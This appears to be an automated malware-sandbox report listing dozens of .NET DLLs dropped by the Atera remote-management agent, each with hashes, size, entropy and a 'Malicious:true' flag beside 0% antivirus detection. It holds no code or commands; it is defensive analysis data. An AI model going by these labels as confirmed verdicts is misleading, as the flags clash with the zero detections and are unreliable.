                                                                                                                                                                                                                                                                                                                                  SHA-256:1252154F3DF81FB62E41F88A9E74FC821DEB8C89201BA2EA0DFB092FD29E49F4
                                                                                                                                                                                                                                                                                                                                  SHA-512:B23885D4F2A0188786FE24B12CBE75479E05E7621B8BB97619851941C2D61DCC0F3EE8365CACD1724ADF541C9DD3702F5D5F339300F5CDAA6DC6017E4A71F2E2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5482914840531965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:lMvnbB39p5YGTv9uuM1iFSF3yE1LlW9KCWsHNyb8E9VF6IYijSJIVxUDYT:lKnbPplTv9uuLuVwrEpYi60f
                                                                                                                                                                                                                                                                                                                                  MD5:B56153EAB3529AC17AAF6B12D8DDA185
                                                                                                                                                                                                                                                                                                                                  SHA1:15CE43D57DA47FE7B7CF2E56279EC589A097838A
                                                                                                                                                                                                                                                                                                                                  SHA-256:2055ED610FB4265A026ED5BF843B0E36D53FBAEB241F91902416AFF33E7D9F0C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5E6BD75ED5D137210ABB60AD40D018D81500CABFF023F13FFD5F7036434B80896BCA4842676B1868C7B37C2832FC002E0BC239718D5DC6F4D3BD40B70CF6B900
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.409153821418013
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:9054t3ibki5TCk3jqEr0WBum6BEpYi60mAA:9PtnUj/Lkm976j5
                                                                                                                                                                                                                                                                                                                                  MD5:E8FC2876C108BFD3947ACDDAEDFE9FF6
                                                                                                                                                                                                                                                                                                                                  SHA1:49EA8F340CB26254D285C78D0D2445EF693929DC
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0641208BABA8C9E0737CAE134C59E66C9A170D83BAB75E8CB22E0748C03CF8B
                                                                                                                                                                                                                                                                                                                                  SHA-512:1D29682BD7EEEA0DEFBEB8B1CD63E8CAD55A857EBE1A54A220D41EB301CD7719B2CC6D5899EABCEE54436DB92D54B96A0A57C45BACA5BB156478F27BDF4C9B23
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.256231698179612
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:hq+RszBJV7CkN9YxrIvw2DLBjYAQP0+lyJ9PPYEpYi60sl/E:hq+SSkNNjdQc+cJNp76HlE
                                                                                                                                                                                                                                                                                                                                  MD5:98E626A565F85C42710AE0CDC81C6F53
                                                                                                                                                                                                                                                                                                                                  SHA1:B62F256FB1016407190707FA6276C182AD3054A7
                                                                                                                                                                                                                                                                                                                                  SHA-256:D242EDE9C4C6091A7531F7C177988CFD73E1D6BB524E393BA9677EE94C727E87
                                                                                                                                                                                                                                                                                                                                  SHA-512:9DEBFB87507046E57E12472EB1C960469B4A4B73D13A360EB23E147EE1EC9A79A9B2C8B5E16003DC1FC7E62B4BF7C3165A9437F3427092B7D0AAE94AB7F15F97
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):85072
Entropy (8bit):6.265379758165329
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):23632
Entropy (8bit):6.614331768655404
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):45136
Entropy (8bit):6.428742326077994
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):47184
Entropy (8bit):6.371206166099372
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):33872
Entropy (8bit):6.46342996949096
Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):66640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.302263838381226
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:AyK1UG8tMAv0by0P/vGCnbr1hmiBPIIk+v76Zn:Aykl8tla/nbr1kiBx3vIn
                                                                                                                                                                                                                                                                                                                                  MD5:2B271F3BC6A5CFAB2D4FE0ABBB71C447
                                                                                                                                                                                                                                                                                                                                  SHA1:551FD1C702C831D9C2B0509F643C8165AD06D651
                                                                                                                                                                                                                                                                                                                                  SHA-256:6783ACC532F672BDCE9C3D952270E660CD078DD028EDC84B2E29C02263F2C988
                                                                                                                                                                                                                                                                                                                                  SHA-512:24A6990B633D5D610E537714DB07F13EAD685F6D27BABA08B2F1AD937B84630D0DFF2B94B39AB33E76E875F4759C6FDA0DF4CA7738D2BDB2493B5D7D91121ECE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.22406475067109
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:VLr8r9NCg8mFjk3dhgVFtkSxq65QXSzeueG9F2x9OgN8GHw+gaoyjcMiwy0J5rax:AsDE/e+9cxoZhNyjcMiJSAopUx+ZM76s
                                                                                                                                                                                                                                                                                                                                  MD5:CC87B27B92D91DD260E70E2CC6668BF5
                                                                                                                                                                                                                                                                                                                                  SHA1:1D1DE42ED85434F33A125EBAF9B1C0AFE7C46008
                                                                                                                                                                                                                                                                                                                                  SHA-256:D4CD472CDB05438538FB8C0EA584C6E4B348DE07AE7C8F51374244ED01ED1070
                                                                                                                                                                                                                                                                                                                                  SHA-512:C51FCB66964A2BC94DB8BB34534F378699CDB4008797DFCE40A069EDC8B7A40794BC26818E578A61C43039E710C63AE0AB9F51A1F8BAE507A3EFE3A96880BEC4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.28712413224749
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:F5PhAi33m3UOZsd4IZnuQDLtfjfCG76pa:jPhAi33mhZiHlvtbfCGOa
                                                                                                                                                                                                                                                                                                                                  MD5:2DAA379002B2F30DC9D6261945715900
                                                                                                                                                                                                                                                                                                                                  SHA1:7D58F57A9EB6320DC91F0CFF9A1798325B826162
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB899E77B933E4B7C7E9B31551D53EE3BBB88DF818F25947C9A38905543C4657
                                                                                                                                                                                                                                                                                                                                  SHA-512:701865D7BD2E04E3E994C9C98309FB8DDD671339E8C4436EFE973E6EA8768AC4643158A3DEA3A7CD53277855ECFBACF685C9DF026C61E3BF5542B06B4535111D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.542622011812947
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:t1YBj07ZyQvkBd9aocTPMuiEjYpR6K698kwgcWWxseU7RWsXNyb8E9VF6IYijSJv:b4jUv6iT9jsi8HyeU7LbEpYi60lk
                                                                                                                                                                                                                                                                                                                                  MD5:B28E359EE304CF6DBBA9CA5246422B69
                                                                                                                                                                                                                                                                                                                                  SHA1:04FC5FFA0CA16BFA2D2FECCE995078B5C4FEB448
                                                                                                                                                                                                                                                                                                                                  SHA-256:4DA83B1CBD62CCCEEABFB09365052E5ED13D439D6D4283F22982F5D398EFA9CC
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9B9D46C7C89F011CF1E470BCE7DAF92DF30D104EC981679106C08083B3C7F8FD224A11D5E47006F100B75027EF493468CA7B5D1058B581243B2DEDC35F3706C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):59472
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332388893764591
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Y7WAluzJ+Je2PS7kJFT+OUjz+Tf26auuPF1/krd6zkwQRIOIzb7E5EpYi60c:UJ4V26g1YuuP/2IOef769
                                                                                                                                                                                                                                                                                                                                  MD5:CA7E9273FEA2E670AB582C58B42B7A90
                                                                                                                                                                                                                                                                                                                                  SHA1:48F3ECCA9E62F6A2CE0DD92F3F2440EA6DCCA5F3
                                                                                                                                                                                                                                                                                                                                  SHA-256:FB13003AD4EBF3925CA466E62D9AAD44B1D38D9C09EB20B2601AC9FA33DFBD6D
                                                                                                                                                                                                                                                                                                                                  SHA-512:BEB11FD39A7BD9A8C9E06910BF98211F062F27ED9577A6F63B9C026A87F74AF09084B204D002B8EAFC5B6BBD2FE5DE6C4E07467C96375D6608D9AE8A02583B48
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21072
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.656935038740096
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RzhlvlfTcbY3SCkWJOVMWskNyb8E9VF6IYijSJIVx2aJW5:LrfTcbY+uEEpYi60Tk
                                                                                                                                                                                                                                                                                                                                  MD5:17EBAD46ACFACD32DBBA0F1ACC2DD195
                                                                                                                                                                                                                                                                                                                                  SHA1:77F710A2DA2BD98EB10B2184AE0673F9ECF8B999
                                                                                                                                                                                                                                                                                                                                  SHA-256:6844D60CD6B19FB3A2264D8A95241DFA9C48D4CE47B83E7649FF972DD3FBD48D
                                                                                                                                                                                                                                                                                                                                  SHA-512:000CA0BCFABDA55780B94381224E07AB65FB96D84374C990F483BCE0C95A518B5EF3B9D303D1FDFDF4CF27C0E2F6CA1C6B74B2FE55D668277C345B3CD3582CB5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.639454335428454
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:13WWQsE/8iqjnqHTnBdOHFgYVwOU3NW2qFWspUNyb8E9VF6IYijSJIVxUo0eVOm:13hQsE/8irTnfYFr/pUEpYi601np
                                                                                                                                                                                                                                                                                                                                  MD5:EBE39C37FCEA443029BF2179DF64A73D
                                                                                                                                                                                                                                                                                                                                  SHA1:3C671B89FC8D9D4E52EB628B47D46ADB4A4A7F98
                                                                                                                                                                                                                                                                                                                                  SHA-256:7ECCDC84DE7BD47081378C617E7CF781B058F3B1B3CD2E621E739DE972A14D01
                                                                                                                                                                                                                                                                                                                                  SHA-512:92C22F5ADAC8230571BDBB40B74DC9879E9928AD095E8DAC409BBDAB5B194A0B75CFF115E949702D061D1D8555B09E37ED4B611FF180DAF906CFA42F731F80EF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575239674516702
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:+oi0m9/A58Ph+mJ5fvIK0ixTryfCWo/zKeGmquanccOB30RtWW3aUWs1Nyb8E9Vq:ODhbJ5nR02TQCWoJ92REpYi601mf
                                                                                                                                                                                                                                                                                                                                  MD5:1A2C139712D951658DAB36867E942BD3
                                                                                                                                                                                                                                                                                                                                  SHA1:0D7ACFA63C91B0C9B83F797DA0C7C0AAE5251C03
                                                                                                                                                                                                                                                                                                                                  SHA-256:5A2A5C9AD7713ABA51F861757BB1F459BF3A8E874CF788BDC55B3ACA55D8983C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5FD78942A4B86339E59634D1A73304F69FFFF8969EF9F590948139810498477099681C7B206DF1329C71D24A63E476DC00D90AF0029932FB9B37BC9A575F6516
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):48208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.411405702981899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:+7d427HfKy1DQ+SKKKKzqPo6Zkn2qZKqLzZdd0UFxtEpYi60p7tHC:+7d42LfKy3SKKKKr8keqBdd0UFE76cHC
                                                                                                                                                                                                                                                                                                                                  MD5:CAB56D9CA8B6174BA8415F1E017C6AB8
                                                                                                                                                                                                                                                                                                                                  SHA1:B935B0ECF759C4E7F0C8C8E7D99B23C976E8DE9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:00D3DC43FB4BE5EB2B68752E5E54E0E182C213A9FC23DAFE5B5B5BBD073780A8
                                                                                                                                                                                                                                                                                                                                  SHA-512:7FE5D1397E87CC171CA17F5CB5CAD4A521C95C7DCB6520D4F606C72169E8CCDC0A3407AD3215C383EFBFDD292E974C22E0FE86364456F9FB6ADB672FA69C9BE5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.626943067066813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:oy1x30dJaeTP8pBT7xe3SUDtzWzK0Ws0Nyb8E9VF6IYijSJIVx61mx4uq:oq/eTeABdW0EpYi60a24D
                                                                                                                                                                                                                                                                                                                                  MD5:E60A5961148A4A258DA7E5636B13513C
                                                                                                                                                                                                                                                                                                                                  SHA1:AF8C56176AB5E9389A24831607BB22109F4E0668
                                                                                                                                                                                                                                                                                                                                  SHA-256:F022F19DF5137AB3D331020A91EF82F14338C14D4B13E35EE454B1DF8E378F4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:69FEF8119FFE10B755D98F3443F2CF4AFC794E7F4AF8E435661705217AE83E08D97DAD78CE8357365E80075E4F8BD906F5637E2F4AA951E650D094E22826CC99
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.347831442138035
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:ng+uGuV+1mb5JtoNIHQs1YyH67beAn9eLfLaV7CvS4fEpYi60k5:ng+uGuV+1mbaqvy9OfLKMS4Y76T
                                                                                                                                                                                                                                                                                                                                  MD5:A8E354B9EEA0EF24846A0B9C2682E854
                                                                                                                                                                                                                                                                                                                                  SHA1:2589334FAF38ABEDF4B4CBEF78A13E8307579719
                                                                                                                                                                                                                                                                                                                                  SHA-256:D1AEDE76866EDB2DF8DC16377EB227D7CDF9DBE38A4A03E2889B4DB578BC2FB6
                                                                                                                                                                                                                                                                                                                                  SHA-512:651C27E2620AF873407FD99DEEF1A7690D7A7775A00D234FB6704220048CEA4744F7F6A8B440B76242C97CF9329ED64DAAB49F25D4168F9A8895A54AD7D4E0DF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3707327440867765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zKsIwjxNp8hpwVeEfHuX1QUIh3kOP7oIyWb3jec/uiCR9Crw3EpYi602HFl:7d8hMfHuXbIkOP7ym3jZ/uiCRgrJ76F
                                                                                                                                                                                                                                                                                                                                  MD5:889E12B6DC6BE1AABEDDE6581315E05F
                                                                                                                                                                                                                                                                                                                                  SHA1:755CE2AF85FC8C1D2C9C78ACD3A5277006E4BE1C
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E71AE5154C370E286F9150293501AC7AA6493C4C5E0CDFD2FDB79952A6E2C51
                                                                                                                                                                                                                                                                                                                                  SHA-512:C697394B69AD9B22E8B6CA2DE2A3754BAD7F758FE1BA13330BDA5E2A8AD499767C2FD2915D8DF712B2E0222C786101A701A63DBF743F26F4BF44A595436AE685
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):345168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.141579347154777
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Lpc1zjTFIfqAnI7FZVllnuJxKrSj8r2yQQLeBLPHGUdlWOAlMoBJR1TaKwQz8wej:WpTCqAn+fnw5h9hdls+IZTWcu
                                                                                                                                                                                                                                                                                                                                  MD5:4C5C7F17107F973D1748B9AFCBAA6264
                                                                                                                                                                                                                                                                                                                                  SHA1:634828376808308B9C3ABBF3F9F23F004C6D3EA7
                                                                                                                                                                                                                                                                                                                                  SHA-256:CEF6856455C837A0D4A12EC74E2CDAFF2AAF58431ECFFFE81D521BA1F9105982
                                                                                                                                                                                                                                                                                                                                  SHA-512:439674BD7DDF725A4713F2D52BFAD85266E6E516BE4C68BB8A1715E56D9260FBD0716F73A40E7BB5CBA6F250F8FE63900D89AA636AE9E103A33261F0C30C320B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.954235606372974
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:HFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDM:lzMTMNNd+g5Wk78GBBjgrIQtD
                                                                                                                                                                                                                                                                                                                                  MD5:10A43CC4F317030814FDE96CEB87F904
                                                                                                                                                                                                                                                                                                                                  SHA1:68FBA8D4CDD1226D79880EC3EE8AC5B2C0D6F2A5
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B277CBC3D41BB821592E162C6CCCCB228976B4BBDD7E287658EC5CC70C1E17A
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C6E8E5FEEEA07FDC10C23B81591A2607CCD99A70CAE29C6D0D3DA0321ADE25A39E39F7CD6486D02D23EDCE18F6F6728FE1FC9F18410A28C27587B6FF1EBA5B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.198273359426846
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:LMiAQB4wmESyxV8pj06e4isQ8gsHsjb/W1DBZ7DhsNcOo:LMZpj06vUsMjbQ77D+Q
                                                                                                                                                                                                                                                                                                                                  MD5:57F49C46D06D307B0993573DFFA1AFAD
                                                                                                                                                                                                                                                                                                                                  SHA1:846051569DCB228225DB120EE73B809B78EAC4DA
                                                                                                                                                                                                                                                                                                                                  SHA-256:10A31774B9390F3A5FBEA8E7986D5C0962144C797595C38B0A143AF8D2047775
                                                                                                                                                                                                                                                                                                                                  SHA-512:D39D9888A9D0B19981B4269CB065471BE2FE6772C8E59B3311A716D65BDCE303F5E51317A79876FB59BB71D40DD1ED4C9FA3ECADBE9CD7E9AB58FCFB675A2833
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
